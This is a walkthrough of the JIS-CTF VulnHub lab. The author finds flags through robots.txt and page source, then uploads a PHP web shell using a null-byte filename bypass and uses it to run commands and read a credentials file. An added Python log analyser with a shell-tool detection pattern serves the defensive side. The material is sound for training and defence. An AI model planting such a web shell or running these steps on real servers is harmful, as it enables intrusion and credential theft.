JIS-CTF- Jordan Infosec Capture The Flag Challenge – Walkthrough

This article is a walkthrough of the Jordan InfoSec CTF challenge: https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

This is a basic web challenge consisting of 5 flags. I ran it on VirtualBox in bridged mode. This challenge doesn’t require Kali OS; you can do it on Windows as well.

To find the vulnerable machines through your attacking machine: http://www.anonhack.in/2018/06/part-2-finding-the-ip-address-of-your-victim-in-your-vmware-hacking-lab-network/

Let’s see the steps:

  1. Boot the machine and use Advanced IP Scanner or netdiscover (in Kali) to get the IP address of the machine. Mine is 192.168.0.106
  2. Scan the host with nmap:

    So the open ports are 80 and 22. Port 80 tells us that it is running a website:


    I checked its source code but found nothing interesting there.


  3. So as always, I checked robots.txt and found some information. The directories that exist in the above file are: admin_area, uploaded_files and flag.

  4. You will find the first flag in the /flag directory.

  5. Now, I visited /admin_area, but it doesn’t give much information:

  6. That is, until you visit its source code, which gives out the second flag and the admin username and password:

  7. I used these login details to log on to the portal from step 2. This upload page appears after logging in:

  8. I uploaded a self-coded PHP command injection file to interact with the machine. The PHP code I used is this:

<?php
// Runs the value of the "kus" query parameter as a shell command and prints its output
$output = shell_exec($_GET['kus']);
echo "<pre>" . $output . "</pre>";
?>

NOTE: I put this code in the file j3.php and uploaded it. At first it wasn’t uploading, and when I checked in Burp Suite I saw it was appending .jpg to the end of the filename, so I used null-byte injection (“j3.php%00.jpg”) to trick the machine, and I successfully got the file uploaded.


  9. With this file uploaded, I can inject OS commands and hence execute them.


  10. I ran this command to go one directory back and list the files in there:

192.168.0.106/uploaded_files/j3.php?kus=ls %% cd ..


I tried to visit flag.txt, but I wasn’t permitted to view the file, so I got a Forbidden message. I then opened the hint.txt file, which got me the 3rd flag.

The hint is pretty straightforward.


  11. The hint tells us that the flag.txt file needs us to be technawi, and for that we need its password. So the first thing I needed to do was find that password. But how? What I knew was that I could only find it under that user, so I tried this command:

http://192.168.0.106/uploaded_files/j3.php?kus=find%20/%20-user%20technawi

which gave me this output:

I read the credentials.txt file via the cat command:

http://192.168.0.106/uploaded_files/j3.php?kus=cat%20/etc/mysql/conf.d/credentials.txt

which gave me the 4th flag with technawi username and password details:
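From the defender's side, the steps above leave a distinctive trail in the web server's access log: a script executed from the upload directory, and query parameters carrying shell commands. The following is an added example (not part of the original post) that parses Apache combined-format log lines and flags both patterns; the log lines, the client IP 192.168.0.50 and the timestamps are constructed for the demonstration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Directory that should only ever serve data files, never run code
UPLOAD_DIR = "/uploaded_files/"
# Script extensions, also as the first part of a double extension such as j3.php.jpg
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)
# Common shell commands at the start of a value or after a shell separator
SHELL_TOKENS = re.compile(
    r"(?:^|[\s;|&`$(])(?:ls|cat|find|id|whoami|uname|wget|curl|nc|bash|sh|python|perl)\b"
)
# Apache combined log format: ip ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log, modelled on the requests made in the walkthrough
SAMPLE_LOG = """\
192.168.0.50 - - [10/Jun/2018:12:00:01 +0000] "POST /admin_area/upload.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Jun/2018:12:00:09 +0000] "GET /uploaded_files/j3.php?kus=ls%20-la HTTP/1.1" 200 301 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Jun/2018:12:00:15 +0000] "GET /uploaded_files/j3.php?kus=find%20/%20-user%20technawi HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.0.50 - - [10/Jun/2018:12:00:30 +0000] "GET /uploaded_files/j3.php?kus=cat%20/etc/mysql/conf.d/credentials.txt HTTP/1.1" 200 160 "-" "Mozilla/5.0"
192.168.0.77 - - [10/Jun/2018:12:01:00 +0000] "GET /uploaded_files/photo.jpg HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
192.168.0.77 - - [10/Jun/2018:12:01:05 +0000] "GET /flag HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None for a benign or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    reasons = []
    if parts.path.startswith(UPLOAD_DIR) and SCRIPT_EXT.search(parts.path):
        reasons.append("script executed from upload directory")
    # parse_qs percent-decodes values, so "ls%20-la" becomes "ls -la" before matching
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if SHELL_TOKENS.search(value):
                reasons.append(f"shell command in parameter {name!r}: {value!r}")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "path": parts.path, "reasons": reasons}


def scan(log_text):
    """Run analyse_line over every line of a log and collect the findings."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The first check alone (a script requested under the upload directory) is worth an alert on its own, since a correctly configured upload directory should have script execution disabled.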

I logged in as technawi using SSH (I used PuTTY, since I used Windows throughout).

Now, the only flag left was in the flag.txt file, which was not forbidden for us under the admin details. I located flag.txt.


This is it folks!

Ciao for Now!